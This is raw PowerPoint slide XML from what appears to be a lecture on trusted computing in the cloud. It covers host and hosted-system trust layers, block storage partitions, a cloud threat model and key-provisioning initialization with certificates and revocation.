                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Encrypted, authenticated, integrity protected channels and storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authenticates additional principals “spoken for” by channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Distributed recovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Update keys, programs,…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3885060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61257" y="189920"/>
            <a:ext cx="11350172" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Turtles all the way down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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637309" y="1440873"/>
            <a:ext cx="10718550" cy="42810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Hosted System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Uses services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Same interface at every level of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Provides services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Some (small) implementation (and configuration) differences for different hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host ancestors are trusted but not siblings or descendants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host – Hosted System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HW – OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HW – VMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>VMM – OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OS – Application (process)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Process – Container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Process – plug in</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129558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Block storage partitions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505325" y="1759353"/>
            <a:ext cx="10944212" cy="4405474"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Partitions are marked regions of a block device, like a disk or SD card.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A partition is a contiguous space of storage on a physical or logical disk that functions as though it were a physically separate disk. Partitions are visible to the system firmware and the installed operating systems. Access to a partition is controlled by the system firmware and the operating system that is currently active.” --- Microsoft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Each partition can have a different file system.  The operating system is loaded by u-boot from a designated partition.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can use the Linux utility </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>parted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> to create partitions on block devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The block storage device contains information on its partitions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>MBR or “partition sector”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Disklabel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>GUID partition table (introduced by UEFI) replaces MBR</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14275411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13657" y="110444"/>
            <a:ext cx="11546114" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cloud setting: protection model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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656771" y="1685930"/>
            <a:ext cx="11059886"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400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adversaries: Co-tenants, insiders (but not “inside” developer), eavesdroppers, technicians</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protect: Key disclosure, integrity violation, data (maybe code)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure: Correct operation, configuration (affecting confidentiality and integrity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Avoid: Large software services written by others that you don’t understand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Slide1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2993572" y="3269890"/>
            <a:ext cx="4358698" cy="3269024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3756465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64885" y="65916"/>
            <a:ext cx="11814629"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4400" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Initialization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="1787470"/>
            <a:ext cx="1905000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25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endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CloudClient</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FA32F8ED-EEB4-4D51-9E8E-3B145D9B9811}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7665501" y="1711270"/>
            <a:ext cx="2667000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25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keyNegoServer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6736300" y="2244670"/>
            <a:ext cx="883701"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 name="Can 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9296400" y="3463870"/>
            <a:ext cx="1219200" cy="24384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Can 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="3154605"/>
            <a:ext cx="1066800" cy="842665"/>
          </a:xfrm>
          <a:prstGeom prst="can">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7860103" y="3387670"/>
            <a:ext cx="1184940" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>My Keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9296400" y="3844871"/>
            <a:ext cx="1334020" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Hashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>HW vendor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> certs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Revocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9357249" y="3067521"/>
            <a:ext cx="914402" cy="30700"/>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1981200" y="2667000"/>
            <a:ext cx="4191000" cy="4038600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148771" y="4004324"/>
            <a:ext cx="9303657" cy="24352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400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>End state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CloudClient has private key that only it can access, while isolated and Policy principal signed certificate for the public key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Policy principal signed certificate can be used to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-457200">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
